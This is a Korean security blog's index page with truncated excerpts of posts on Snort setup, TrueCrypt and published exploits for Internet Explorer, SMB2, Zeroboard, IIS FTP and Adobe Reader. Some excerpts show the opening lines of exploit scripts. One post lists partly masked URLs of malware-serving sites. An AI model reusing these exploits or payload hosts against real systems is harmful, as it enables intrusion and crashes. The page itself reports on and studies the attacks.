ByJJoon's Lab

[카테고리:] Security

  • Snort (Windows) 설치 및 설정

    1. 프로그램 다운로드Snort : http://www.snort.org/WinPcap : http://www.winpcap.org/2. 프로그램 설치다운로드 받은 스노트 설치파일을 실행하여 설치한다.설치 시 나오는 DB 설정 관련은 그냥 무시하고 제일 상단 옵션으로 설치한다.그리고 설치경로는 이후 설정하기 편하게 기본설정인 “C:\Snort” 경로에 설치한다.설치 후 Winpcap 설치를 하라는 메세지가 나온다. 확인 후 다운로드 받은 Winpcap 설치한다.3. Snort 설정Snort 설정파일은 C:\Snort\etc\snort.conf 이다.이 파일을 수정하는데 기존 설정은 리눅스 […]

  • Internet Explorer 6/7 CSS Handling Denial of Service

    Offensive Security 사이트에 익스플로러 관련 취약점이 올라왔다. 올라온 POC 코드는 쉘코드 부분이 계산기를 실행하는 쉘코드로 보이나 수정을 해야 할 것으로 보인다. 아래는 수정한 POC 코드이다. 음.. 이제 다음은 얘인가? <!– securitylab.ir K4mr4n_st (at) yahoo (dot) com [email concealed] –> <!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <script> function load(){ var e; […]

  • Windows 7 , Server 2008R2 Remote Kernel Crash

    ============================================= – Release date: November 11th, 2009 – Discovered by: Laurent Gaffie – Severity: Medium/High ============================================= I. VULNERABILITY ————————- Windows 7 * , Server 2008R2 Remote Kernel Crash II. BACKGROUND ————————- #FAIL,#FAIL,#FAIL SDL FAIL, 'Most Secure Os Ever' –> Remote Kernel in 2 mn. #FAIL,#FAIL,#FAIL III. DESCRIPTION ————————- See : http://g-laurent.blogspot.com/ for much more details […]

  • Adobe Reader/Acrobat 0-Day 확인 방법! (CVE-2009-3459)

    몇일 전 Adobe Reader/Acrobat 관련 0-Day 취약점(CVE-2009-3459)이 발표되었습니다. (자세한 내용 : http://blogs.adobe.com/psirt/2009/10/adobe_reader_and_acrobat_issue_1.html) 현재 Adobe 사에서 해당 취약점에 대한 패치는 공개 하였으나 PDF 파일에서 해당 취약점이 존재하는지 확인할 경우가 있을거 같아 포스팅을 합니다. 얼마전에 PDF 파일 분석하기 라는 내용으로 포스팅을 한 글이 있습니다. 해당 글에 보면 PDFiD(PEiD 이름에서 따온 것으로 추측….) 툴이 나옵니다. 이 툴을 이용하여 […]

  • 웹페이지에 삽입되는 악성코드가 이용하는 취약점 리스트

    MS Internet Explorer 7 Video ActiveX Remote Buffer Overflow Exploit (MS09-032) CLSID : 0955AC62-BF2E-4CBA-A2B9-A63F772D46CF http://www.microsoft.com/korea/technet/security/bulletin/MS06-014.mspx Internet Explorer Uninitialized Memory Corruption Vulnerability (MS09-002) CLSID : AE24FDAE-03C6-11D1-8B76-0080C744F389 http://www.microsoft.com/korea/technet/security/bulletin/MS09-002.mspx Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014) CLSID : BD96C556-65A3-11D0-983A-00C04FC29E36 http://www.microsoft.com/korea/technet/security/bulletin/MS06-014.mspx Microsoft Office Web Components (Spreadsheet) ActiveX BOF (MS09-043) http://www.microsoft.com/korea/technet/security/bulletin/ms09-043.mspx http://ij**ar.cn/x2/xx.html http://ij**ar.cn/x2/Td14.htm – MS06-014 http://ij**ar.cn/x2/14.js http://d.gd**w.com/xx/x2.css http://ij**ar.cn/x2/15.js http://ij**ar.cn/x2/17.js […]

  • Vista/2008/Windows 7 SMB2 BSOD 0Day

    Vista / 2008 / Windows7 에서 SMB 2.0 에 대한 BSOD(Blue Screen Of Death) 취약점이 나왔네요. 어찌보면 크리티컬한 취약점이지만 그냥 그저 그러네요…. #!/usr/bin/python # When SMB2.0 recieve a '&' char in the 'Process Id High' SMB header field it dies with a # PAGE_FAULT_IN_NONPAGED_AREA from time import sleep from socket import * import sys if […]

  • Zeroboard 4.1 pl7 now_connect() Remote Code Execution Exploit

    Zeroboard 4.1 pl7에 대한 Exploit 코드가 공개되었네요. http://milw0rm.com/exploits/9590 취약점은 예전에 알려진 취약점으로 이미 pl8 버젼에 패치가 되었던걸로 기억하네요. 하지만 여전히 패치가 안된 서버가 많겠죠? -_- /* poc by kyoungchip,jang email : [email protected] [*] the bug – http://www.xpressengine.com/15955761 Application – Zeroboard 4.1 pl7 Reference: – http://www.nzeo.com – Zeroboard preg_replace() vulnerability Remote nobody exploit by n0gada [*] […]

  • Adobe Acrobat/Reader < 7.1.1/8.1.3/9.1 Collab getIcon Universal Exploit (CVE-2009-0927)

    새로운 Adobe Acrobat Reader 취약점!얼마전 0-Day가 나와 패치된지 얼마 되지 않았는데 새로운 취약점이 나왔습니다.게시자는 Firefox 3.0.13 and Internet Explorer 7에서 Test 해봤으며 영향을 줬다고 합니다.자세한 내용은 아래 사이트를 참고! http://www.milw0rm.com/exploits/9579

  • TrueCrypt – 내 데이터를 보호하자!

    최근 아래 링크와 같은 기사가 나왔습니다. http://www.etnews.co.kr/news/detail.html?portal=001_00001&id=200909010176기사에서 처럼 미국 입국 시 공항에서 노트북, PDA 등 저장매체에 대한 검사를 한다고 합니다.개인의 사생활 침해 뿐만 아니라 기업의 영업비밀 등 여러 자료가 노출될 수도 있는 부분인대요…개인의 데이터를 안전하게 보관할 수 있는 TrueCrypt 라는 프로그램을 소개하도록 하겠습니다.이 프로그램은 개인의 파일을 암호화 하여 저장시켜 주는 Open Source 프로그램 입니다.프로그램은 아래 […]

  • Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploit (win2k)

    8월 31일자로 milw0rm 사이트에 제로데이가 올라왔습니다. 윈도우 FTP 서버 취약점인데 Remote라 심각성이 클것으로 보이네요. http://www.offensive-security.com/videos/microsoft-ftp-server-remote-exploit/msftp.html # IIS 5.0 FTPd / Remote r00t exploit # Win2k SP4 targets # bug found & exploited by Kingcope, kcope2<at>googlemail.com # Affects IIS6 with stack cookie protection # August 2009 – KEEP THIS 0DAY PRIV8 use IO::Socket; $|=1; #metasploit shellcode, […]